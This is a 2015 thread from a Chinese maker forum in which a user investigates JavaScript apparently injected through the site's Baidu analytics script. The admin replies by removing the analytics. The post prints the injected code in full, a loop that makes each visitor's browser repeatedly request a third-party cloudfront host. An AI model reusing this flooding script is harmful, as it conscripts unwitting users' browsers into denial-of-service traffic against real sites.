极客工坊

 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 3081|回复: 4

请教这里的管理人员, 论坛要阻挡什麽人进入吗?

[复制链接]
发表于 2015-3-17 20:53:44 | 显示全部楼层 |阅读模式
由於近日连接 geek-workshop 出了点问题, 细心研究了一遍这个网站的源码, 发觉有点奇怪的地方.

在论坛的源码(forum.php)中, 有以下的一段:
  1. <script type="text/javascript">
  2. var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
  3. document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F5f8d64f479335f9059cacd72ba1019c5' type='text/javascript'%3E%3C/script%3E"));
  4. </script>
复制代码
当中会加入一个  http://hm.baidu.com/h.js , 而这个 js 有点奇怪, 在某些地方访问它, 结果会是空白的.
但亦有可能接收到以下的一段 javascript.
  1. document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'><\/script>");
  2. !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'><\/script>");
  3. startime=new Date().getTime();
  4. var count = 0;

  5. function unixtime()
  6. {
  7.         var dt = new Date();
  8.         var ux = Date.UTC(dt.getFullYear(),dt.getMonth(),dt.getDay(),dt.getHours(),dt.getMinutes(),dt.getSeconds())/1000;
  9.         return ux;
  10. }

  11. function get()
  12. {
  13.         var ping;
  14.         $.ajax({
  15.                         url: "http://d3rkfw22xppori.cloudfront.net/_close?t="+unixtime(),
  16.                         dataType: "text",
  17.                         timeout: 10000,
  18.                         cache:true,
  19.                         beforeSend : function()
  20.                         {
  21.                                 requestTime = new Date().getTime();
  22.                         },
  23.                         complete : function()
  24.                         {
  25.                                 responseTime = new Date().getTime();
  26.                                 ping = Math.floor(responseTime-requestTime);                                
  27.                                 if(responseTime-startime<300000)
  28.                                 {
  29.                                         r_send(ping);
  30.                                         count = count + 1;
  31.                                 }
  32.                         }
  33.                 });

  34. }

  35. function r_send(ping)
  36. {
  37.         setTimeout("get()", ping);
  38. }
  39. setTimeout("get()", 2000);
复制代码
如果接收了这段 javascript, 就会不断向  http://d3rkfw22xppori.cloudfront.net 发出请求, 结果都是 No 'Access-Control-Allow-Origin'.  最後在讨论中的 javasript 都不能正常执行.

看似是为了阻挡某些地方的连结似的, 但 geek-workshop 又不像是要对什麽人封锁, 所以想请教管理员, 是否有什麽原因, 要加入这样的封锁?  可否让 geek-workshop 完全开放呢?
回复

使用道具 举报

发表于 2015-3-18 00:27:04 | 显示全部楼层
难道是我装了百度站点统计的原因?我把百度站点统计关了看看
回复 支持 反对

使用道具 举报

发表于 2015-3-18 00:31:32 | 显示全部楼层
已经把百度统计删了。。。。。不知道还有没有这种问题
回复 支持 反对

使用道具 举报

发表于 2015-3-18 08:28:28 | 显示全部楼层
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-3-18 09:15:39 | 显示全部楼层
弘毅 发表于 2015-3-18 00:27
难道是我装了百度站点统计的原因?我把百度站点统计关了看看

oh, 原來是為了 統計之用, 如果是為了計算論壇的流量, 而其他人沒問題的話, 我也不想影響大家.  其實我自己在 hosts table 中把 hm.baidu.com 指向 localhost 127.0.0.1, 已把問題解決了, 只是想了解一下原因.

另外, 也請問 弘毅大大, 如果你直接打開百度那個 h.js 的連結 http://hm.baidu.com/h.js  , 會是空白的, 還是接收到上面那段 javascript?

点评

用德哩滴论坛框架噶管理员,大概都无你甘得闲理埋哩滴湿碎野嘎啦。  发表于 2015-3-26 02:29
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|联系我们|极客工坊 ( 浙ICP备09023225号 )

GMT+8, 2019-1-19 00:38 , Processed in 0.126073 second(s), 25 queries .

Powered by Discuz! X3.4 Licensed

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表